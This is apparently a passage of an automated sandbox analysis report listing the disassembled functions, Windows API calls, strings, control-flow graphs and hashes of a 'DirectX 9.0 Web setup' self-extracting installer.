                                                                                                • Associated: 00000002.00000002.2505418642.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2505988293.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2506287728.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: Resource$Local$ErrorFindFreeLast$AllocAttributesDirectoryDriveFileLoadLockMessagePathSizeofTempTypeWindowslstrcmplstrcpy
                                                                                                • String ID: <None>$A:\$C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                                • API String ID: 535033332-1216675450
                                                                                                • Opcode ID: 6850fc883a11cab837c26050fb0a112f3f6a7a0a4a41dfd58cf56b6d104f570a
                                                                                                • Instruction ID: 096894b9e67c34d8375bb897499805253a01f20e87239c6fdf17a2f350f7322a
                                                                                                • Opcode Fuzzy Hash: 6850fc883a11cab837c26050fb0a112f3f6a7a0a4a41dfd58cf56b6d104f570a
                                                                                                • Instruction Fuzzy Hash: B661AAB4A40355BAFB3397755D89FEB26ACAB19744F400491FBC9E60C1E6B4C6808F64
                                                                                                Function 01002F7A Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 63filestringCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • wsprintfA.USER32 ref: 01002F9A
                                                                                                • lstrcpyA.KERNEL32(?,?), ref: 01002FAC
                                                                                                  • Part of subcall function 01005B32: lstrlenA.KERNEL32(01003456,0000002F,0100B89A,01003456,0100B89A,01001251), ref: 01005B39
                                                                                                  • Part of subcall function 01005B32: CharPrevA.USER32(01003456,00000000), ref: 01005B49
                                                                                                  • Part of subcall function 01005B32: lstrcpyA.KERNEL32(00000000,?), ref: 01005B66
                                                                                                • RemoveDirectoryA.KERNELBASE(?,?,?), ref: 01002FBE
                                                                                                • GetFileAttributesA.KERNELBASE(?), ref: 01002FC5
                                                                                                • GetTempFileNameA.KERNEL32(?,IXP,00000000,?), ref: 01002FED
                                                                                                • DeleteFileA.KERNEL32(?), ref: 01002FFB
                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 01003004
                                                                                                • CreateDirectoryA.KERNELBASE(?,00000000), ref: 01003019
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2505716823.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.2505418642.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2505988293.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2506287728.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: DirectoryFile$Createlstrcpy$AttributesCharDeleteNamePrevRemoveTemplstrlenwsprintf
                                                                                                • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$IXP$IXP%03d.TMP
                                                                                                • API String ID: 3224660439-1581276140
                                                                                                • Opcode ID: cc23fafd31c200b07fe8fdd91d20a1ba6cd3f4739df2429ec796210adebc7534
                                                                                                • Instruction ID: e7c67a7043ec5c6bac1d4f2c1b8a734ea561e127a1ee01801807ea9209cd36ee
                                                                                                • Opcode Fuzzy Hash: cc23fafd31c200b07fe8fdd91d20a1ba6cd3f4739df2429ec796210adebc7534
                                                                                                • Instruction Fuzzy Hash: A311E1312092496FE373AB65EC48FEB3BACEF46351F000129F6C5D1084DEBA950587A6
                                                                                                Function 01003E60 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 65stringmemoryfileCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • lstrlenA.KERNEL32(01004BBC,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,?,00000000,01004BBC,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\), ref: 01003E68
                                                                                                • LocalAlloc.KERNEL32(00000040,-00000014,?,00000000,01004BBC,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\), ref: 01003E74
                                                                                                • lstrcpyA.KERNEL32(00000000,01004BBC,771A83C0,?,00000000,01004BBC,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\), ref: 01003EA3
                                                                                                • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,00000000,TMP4351$.TMP,?,00000000,01004BBC,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\), ref: 01003EC4
                                                                                                • LocalFree.KERNEL32(00000000,?,00000000,01004BBC,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\), ref: 01003ECD
                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,01004BBC,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\), ref: 01003ED9
                                                                                                • GetFileAttributesA.KERNELBASE(01004BBC,?,00000000,01004BBC,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\), ref: 01003EE0
                                                                                                  • Part of subcall function 010038CC: MessageBoxA.USER32(00000000,?,DirectX 9.0 Web setup,00000000), ref: 01003946
                                                                                                  • Part of subcall function 01003547: GetLastError.KERNEL32(771C4B00,01004003), ref: 0100354E
                                                                                                  • Part of subcall function 01003547: GetLastError.KERNEL32 ref: 01003554
                                                                                                Strings
                                                                                                • C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\, xrefs: 01003E66
                                                                                                • TMP4351$.TMP, xrefs: 01003EA9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2505716823.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.2505418642.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2505988293.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2506287728.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorFileLastLocal$AllocAttributesCloseCreateFreeHandleMessagelstrcpylstrlen
                                                                                                • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$TMP4351$.TMP
                                                                                                • API String ID: 3688570051-3788082193
                                                                                                • Opcode ID: cec466b1454d8152f2b6b7027edac8848f359d804bd141f2f042a694d3e2b742
                                                                                                • Instruction ID: 07e8854d2f4717a7fcec1bdd87890a29ac9275318df03397e391de66aed45773
                                                                                                • Opcode Fuzzy Hash: cec466b1454d8152f2b6b7027edac8848f359d804bd141f2f042a694d3e2b742
                                                                                                • Instruction Fuzzy Hash: 9A11A5726016447FE223AF799C49F9F3E5CEB06369F014514F2D6E90C5C7BA94418B74
                                                                                                Function 010049DB Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 107windowCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 443 10049db-10049e2 call 1002e6f 446 10049e4 443->446 447 10049e5-10049f1 443->447 448 10049f3-1004a1b GetDlgItem ShowWindow GetDlgItem ShowWindow 447->448 449 1004a1d-1004a2a call 1003c60 447->449 448->449 452 1004a38-1004a6e call 1005ebf 449->452 453 1004a2c-1004a36 449->453 458 1004aa0-1004aaf 452->458 459 1004a70-1004a87 call 1006e88 452->459 455 1004ab0-1004abb call 10038cc 453->455 462 1004abd-1004ac4 455->462 458->455 463 1004a8c-1004a93 459->463 464 1004ad3-1004ad5 462->464 465 1004ac6-1004acd FreeResource 462->465 463->462 466 1004a95-1004a9e call 10069c2 463->466 467 1004ad7-1004add 464->467 468 1004aef-1004af6 464->468 465->464 466->458 466->462 467->468 469 1004adf-1004aea call 10038cc 467->469 470 1004b14-1004b19 468->470 471 1004af8-1004aff 468->471 469->468 471->470 474 1004b01-1004b0e SendMessageA 471->474 474->470
                                                                                                APIs
                                                                                                  • Part of subcall function 01002E6F: FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 01002E89
                                                                                                  • Part of subcall function 01002E6F: LoadResource.KERNEL32(00000000,00000000,?,010059A0), ref: 01002E92
                                                                                                  • Part of subcall function 01002E6F: LockResource.KERNEL32(00000000,?,010059A0), ref: 01002E99
                                                                                                • GetDlgItem.USER32(00000000,00000842), ref: 01004A00
                                                                                                • ShowWindow.USER32(00000000,?,00000000,00000001,0100525B,?,010059A0), ref: 01004A09
                                                                                                • GetDlgItem.USER32(00000841,00000005), ref: 01004A18
                                                                                                • ShowWindow.USER32(00000000,?,00000000,00000001,0100525B,?,010059A0), ref: 01004A1B
                                                                                                • FreeResource.KERNEL32(00000000,-00000514,00000000,00000000,00000010,00000000,?,?,?,00000000,00000001,0100525B,?,010059A0), ref: 01004AC7
                                                                                                • SendMessageA.USER32(00000FA1,00000000,00000000,-00000514), ref: 01004B0E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2505716823.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.2505418642.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2505988293.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2506287728.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: Resource$ItemShowWindow$FindFreeLoadLockMessageSend
                                                                                                • String ID: *MEMCAB
                                                                                                • API String ID: 3694369891-3211172518
                                                                                                • Opcode ID: c58f8bc2a7f7b26109adb1d35207193ebaf4e78ef12d8e4ecae876ef37705db9
                                                                                                • Instruction ID: 5c6169ab3c9c94f66ae9421972872bc9d1b968acd00de396031396c823d54b5c
                                                                                                • Opcode Fuzzy Hash: c58f8bc2a7f7b26109adb1d35207193ebaf4e78ef12d8e4ecae876ef37705db9
                                                                                                • Instruction Fuzzy Hash: 3E31EA313813117AF63367579C89F972D8DDB56B65F400454F7C8E60C6C6FA889087A9
                                                                                                Function 01004560 Relevance: 10.6, APIs: 7, Instructions: 90processsynchronizationwindowCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 476 1004560-1004575 477 1004651-1004654 476->477 478 100457b-100459d CreateProcessA 476->478 479 1004609-1004647 call 1003547 GetLastError FormatMessageA call 10038cc 478->479 480 100459f-10045c0 WaitForSingleObject GetExitCodeProcess 478->480 492 100464c 479->492 482 10045c2-10045c9 480->482 483 10045e3-1004600 call 10028fa CloseHandle * 2 480->483 482->483 485 10045cb-10045cd 482->485 490 1004602-1004605 483->490 491 100464e-1004650 483->491 485->483 489 10045cf-10045db 485->489 489->483 493 10045dd 489->493 490->491 494 1004607 490->494 491->477 492->491 493->483 494->492
                                                                                                APIs
                                                                                                • CreateProcessA.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000020,00000000,00000000,?,?,00000001,771AF530,00000000), ref: 01004595
                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 010045A4
                                                                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 010045B1
                                                                                                • CloseHandle.KERNEL32(?,?), ref: 010045F2
                                                                                                • CloseHandle.KERNEL32(?), ref: 010045F7
                                                                                                • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 01004621
                                                                                                • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 0100462E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2505716823.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.2505418642.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2505988293.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2506287728.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                                                • String ID:
                                                                                                • API String ID: 3183975587-0
                                                                                                • Opcode ID: 5c87e306d1f07bbbd259af49f0d2f9332393d95cbae5d4cdd0f23aea241cfee2
                                                                                                • Instruction ID: 4dc6fc445a0a4644286cad31dd2cd9ca33170ca9f30bc41b6ca94f876d6a0a06
                                                                                                • Opcode Fuzzy Hash: 5c87e306d1f07bbbd259af49f0d2f9332393d95cbae5d4cdd0f23aea241cfee2
                                                                                                • Instruction Fuzzy Hash: 4521AD35501228BFEB239FA5CC48EEF7BA9FF09360F004025FB94D6095C6768644CBA5
                                                                                                Function 01003D9A Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 76memoryCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 495 1003d9a-1003dbf call 1002a34 LocalAlloc 498 1003dc1-1003ddb call 10038cc call 1003547 495->498 499 1003ddd-1003de7 call 1002a34 495->499 512 1003e59 498->512 505 1003de9-1003e0a call 10038cc LocalFree 499->505 506 1003e0c-1003e1a lstrcmpA 499->506 505->512 509 1003e28-1003e45 call 10038cc LocalFree 506->509 510 1003e1c-1003e1d LocalFree 506->510 517 1003e47-1003e4d 509->517 518 1003e4f 509->518 514 1003e23-1003e26 510->514 515 1003e5b-1003e5f 512->515 514->515 517->514 518->512
                                                                                                APIs
                                                                                                  • Part of subcall function 01002A34: FindResourceA.KERNEL32(00000000,00000000,0000000A), ref: 01002A48
                                                                                                  • Part of subcall function 01002A34: SizeofResource.KERNEL32(00000000,00000000,?,01004C70,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01002A4C
                                                                                                  • Part of subcall function 01002A34: FindResourceA.KERNEL32(00000000,00000000,0000000A), ref: 01002A68
                                                                                                  • Part of subcall function 01002A34: LoadResource.KERNEL32(00000000,00000000,?,01004C70,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01002A6C
                                                                                                  • Part of subcall function 01002A34: LockResource.KERNEL32(00000000,?,01004C70,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01002A73
                                                                                                • LocalAlloc.KERNEL32(00000040,00000001,UPROMPT,00000000,00000000,?,00000000,?,?,01005917,00000000,01005A22,00000000,01005ACB,?,?), ref: 01003DB5
                                                                                                • LocalFree.KERNEL32(00000000,00000000,000004B1,00000000,00000000,00000010,00000000,UPROMPT,00000000,00000000,?,00000000,?,?,01005917,00000000), ref: 01003DFA
                                                                                                  • Part of subcall function 010038CC: MessageBoxA.USER32(00000000,?,DirectX 9.0 Web setup,00000000), ref: 01003946
                                                                                                  • Part of subcall function 01003547: GetLastError.KERNEL32(771C4B00,01004003), ref: 0100354E
                                                                                                  • Part of subcall function 01003547: GetLastError.KERNEL32 ref: 01003554
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2505716823.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.2505418642.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2505988293.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2506287728.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: Resource$ErrorFindLastLocal$AllocFreeLoadLockMessageSizeof
                                                                                                • String ID: <None>$UPROMPT
                                                                                                • API String ID: 226386726-2980973527
                                                                                                • Opcode ID: 19c4e163a1090a162578199d223b225934aaa3b1b5a0be56976e72415ee7bbe1
                                                                                                • Instruction ID: fcd82f8eb2d96e34fe2045f7d831227921619ed0845e22903694ad8dcf9b4982
                                                                                                • Opcode Fuzzy Hash: 19c4e163a1090a162578199d223b225934aaa3b1b5a0be56976e72415ee7bbe1
                                                                                                • Instruction Fuzzy Hash: F01190B164178ABFF2236B329C48F9B3B5CEB0A798F014114F6C29D0C6D7BAA4004B74
                                                                                                Function 01004888 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 105COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 519 1004888-1004899 520 10048b5-10048bb 519->520 521 100489b-100489f 519->521 522 10049d0-10049d3 call 1002e1b 520->522 523 10048c1-10048c2 520->523 524 10048a1-10048ac call 1002cb2 521->524 525 10048ad-10048b0 521->525 526 10049d8-10049da 522->526 528 10048c4-10048c5 523->528 529 10048cd-10048cf 523->529 524->525 525->526 532 10048c7-10048c8 528->532 533 100493e-1004948 528->533 529->526 536 10048d4-10048f2 call 1002acd 532->536 537 10048ca-10048cb 532->537 534 1004959-1004974 call 1002acd 533->534 535 100494a-1004953 SetDlgItemTextA 533->535 534->525 542 100497a-1004988 call 1004809 534->542 535->534 536->525 543 10048f4-100490c call 1002d87 536->543 537->525 537->529 542->529 548 100498e-10049ac call 1003b9b 542->548 543->525 549 100490e-1004939 call 1002cb2 call 1002ded SetFileAttributesA 543->549 548->525 555 10049b2-10049c0 call 1003a7a 548->555 549->526 555->525 559 10049c6-10049ce 555->559 559->526
                                                                                                APIs
                                                                                                  • Part of subcall function 01002ACD: lstrlenA.KERNEL32(00000104,?,?,?,01004972,?,00000104,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,?), ref: 01002ADB
                                                                                                  • Part of subcall function 01002ACD: lstrlenA.KERNEL32(?,?,?,?,01004972,?,00000104,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,?), ref: 01002AE2
                                                                                                • SetFileAttributesA.KERNELBASE(?,00000000,?,?,?,?,?,00000104,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,?), ref: 0100492B
                                                                                                • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 01004953
                                                                                                  • Part of subcall function 01002E1B: lstrcpyA.KERNEL32(0100B17C,AA4CA1C3,?,?,010049D8,?), ref: 01002E3E
                                                                                                  • Part of subcall function 01002E1B: lstrcpyA.KERNEL32(0100B280,FFFFE48F,?,?,010049D8,?), ref: 01002E48
                                                                                                  • Part of subcall function 01002E1B: lstrcpyA.KERNEL32(0100B384,0175C085,?,?,010049D8,?), ref: 01002E52
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2505716823.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.2505418642.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2505988293.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2506287728.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: lstrcpy$lstrlen$AttributesFileItemText
                                                                                                • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\
                                                                                                • API String ID: 1052324692-1955631000
                                                                                                • Opcode ID: fe65d99b2ab9b239a6f2feaefbfaa6b709843359da61f41e70cea4a7b0a25d04
                                                                                                • Instruction ID: 9c3945019062b96abff1775c7a9c12b98a3233307227bea5132d982746a7d7c1
                                                                                                • Opcode Fuzzy Hash: fe65d99b2ab9b239a6f2feaefbfaa6b709843359da61f41e70cea4a7b0a25d04
                                                                                                • Instruction Fuzzy Hash: EB31F47160020AABFF73AB78CD44EDE77E8AB04714F0049A1BBD5D60C0DAB4DA94C724
                                                                                                Function 01002D87 Relevance: 4.5, APIs: 3, Instructions: 39timeCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 560 1002d87-1002d9e 561 1002da0-1002da2 560->561 562 1002da4-1002db6 DosDateTimeToFileTime 560->562 563 1002de8-1002dea 561->563 562->561 564 1002db8-1002dc8 LocalFileTimeToFileTime 562->564 564->561 565 1002dca-1002de6 SetFileTime 564->565 565->563
                                                                                                APIs
                                                                                                • DosDateTimeToFileTime.KERNEL32(?,00000104,00000104), ref: 01002DAE
                                                                                                • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 01002DC0
                                                                                                • SetFileTime.KERNELBASE(?,?,?,?), ref: 01002DDC
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2505716823.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.2505418642.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2505988293.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2506287728.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: Time$File$DateLocal
                                                                                                • String ID:
                                                                                                • API String ID: 2071732420-0
                                                                                                • Opcode ID: 96a0a1fe93097ab5083efa3cebb417dec1f1aca17dfb0d7ec9085fdad69f0f66
                                                                                                • Instruction ID: 272d08cd781b42647d3e3cd2aab8a48c674a3e0d441df13359d39e46509fec88
                                                                                                • Opcode Fuzzy Hash: 96a0a1fe93097ab5083efa3cebb417dec1f1aca17dfb0d7ec9085fdad69f0f66
                                                                                                • Instruction Fuzzy Hash: 81F01D7650011AABDF62DFA4CD49DEF7BBCEF04300F00056AFA96D2054EA31D605CB60
                                                                                                Function 01001E52 Relevance: 4.5, APIs: 3, Instructions: 32registryCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 566 1001e52-1001e76 RegOpenKeyExA 567 1001e78-1001e8d RegQueryValueExA 566->567 568 1001e9b-1001ea0 566->568 569 1001e92-1001e95 RegCloseKey 567->569 570 1001e8f 567->570 569->568 570->569
                                                                                                APIs
                                                                                                • RegOpenKeyExA.KERNELBASE(80000002,010045E9,00000000,00020019,010045E9,00000000,?,?,01001F1E,System\CurrentControlSet\Control\Session Manager,PendingFileRenameOperations,01001F3D,010045E9,01002634,00000003,00000000), ref: 01001E6E
                                                                                                • RegQueryValueExA.KERNELBASE(010045E9,0100290E,00000000,00000000,00000000,?,?,01001F1E,System\CurrentControlSet\Control\Session Manager,PendingFileRenameOperations,01001F3D,010045E9,01002634,00000003,00000000,0100290E), ref: 01001E85
                                                                                                • RegCloseKey.KERNELBASE(010045E9,?,01001F1E,System\CurrentControlSet\Control\Session Manager,PendingFileRenameOperations,01001F3D,010045E9,01002634,00000003,00000000,0100290E,010045E9,?), ref: 01001E95
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2505716823.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.2505418642.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2505988293.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2506287728.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseOpenQueryValue
                                                                                                • String ID:
                                                                                                • API String ID: 3677997916-0
                                                                                                • Opcode ID: 7a797c0b9dcb7767ccf906ce318d436ef8d89cccfb9cdaf3cd7182f96baaf62c
                                                                                                • Instruction ID: 28be454f978d5970a4e16e1394c3bca2c1ef4d0bed3d580e281dbf39f647a0de
                                                                                                • Opcode Fuzzy Hash: 7a797c0b9dcb7767ccf906ce318d436ef8d89cccfb9cdaf3cd7182f96baaf62c
                                                                                                • Instruction Fuzzy Hash: E1F0D475A01128FBEB229F92DD08DEFBFACEF057A0F008055F98996150D771DA10EBA0
                                                                                                Function 01005B32 Relevance: 4.5, APIs: 3, Instructions: 27stringCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • lstrlenA.KERNEL32(01003456,0000002F,0100B89A,01003456,0100B89A,01001251), ref: 01005B39
                                                                                                • CharPrevA.USER32(01003456,00000000), ref: 01005B49
                                                                                                • lstrcpyA.KERNEL32(00000000,?), ref: 01005B66
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2505716823.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.2505418642.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2505988293.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2506287728.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: CharPrevlstrcpylstrlen
                                                                                                • String ID:
                                                                                                • API String ID: 3191087442-0
                                                                                                • Opcode ID: fdd7714bb6593d9bd24b37b8e314602ef278b422ca2b5f9048e4f286ffae7ea1
                                                                                                • Instruction ID: a8693eed6350a8dedeae3d565ef5e12137dbdc0ab456e1eef33ff5164d9f3c36
                                                                                                • Opcode Fuzzy Hash: fdd7714bb6593d9bd24b37b8e314602ef278b422ca2b5f9048e4f286ffae7ea1
                                                                                                • Instruction Fuzzy Hash: 5AE06531504A909FF36757189C08BAB7FD8EB86261F150485F5DA93181D37958428F71
                                                                                                Function 010058FE Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 74COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SetCurrentDirectoryA.KERNELBASE(C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000,01005A22,00000000,01005ACB,?,?,01005ACB,00000000), ref: 0100596D
                                                                                                  • Part of subcall function 01003D9A: LocalAlloc.KERNEL32(00000040,00000001,UPROMPT,00000000,00000000,?,00000000,?,?,01005917,00000000,01005A22,00000000,01005ACB,?,?), ref: 01003DB5
                                                                                                Strings
                                                                                                • C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\, xrefs: 01005968
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2505716823.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.2505418642.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2505988293.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2506287728.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocCurrentDirectoryLocal
                                                                                                • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\
                                                                                                • API String ID: 4261067767-1955631000
                                                                                                • Opcode ID: 8bb4dfa89a94fb33ff207bed1ff5b7d72056520cb165bd43416798504c0b475c
                                                                                                • Instruction ID: 549888cb111fa0db324d5ce591e14e605fa8575ce561743fb142ccc2cd60ac89
                                                                                                • Opcode Fuzzy Hash: 8bb4dfa89a94fb33ff207bed1ff5b7d72056520cb165bd43416798504c0b475c
                                                                                                • Instruction Fuzzy Hash: 572175356453139FBFB3BB796D0276A37D4AA176B4F0804AAD5C4C11C5EB3A8180DFA2
                                                                                                Function 01003B00 Relevance: 3.1, APIs: 2, Instructions: 64fileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CreateFileA.KERNELBASE(01003CBD,00000000,00000000,00000000,0000017D,00000080,00000000,00000000,00000000,?,00000000,01003C3C,00000180,00008000,?), ref: 01003B74
                                                                                                • CreateFileA.KERNEL32(01003CBD,00000000,00000000,00000000,0000017D,00000080,00000000,01003CBD,?,00000000,01003C3C,00000180,00008000,?,?,01003CBD), ref: 01003B92
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2505716823.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.2505418642.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2505988293.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
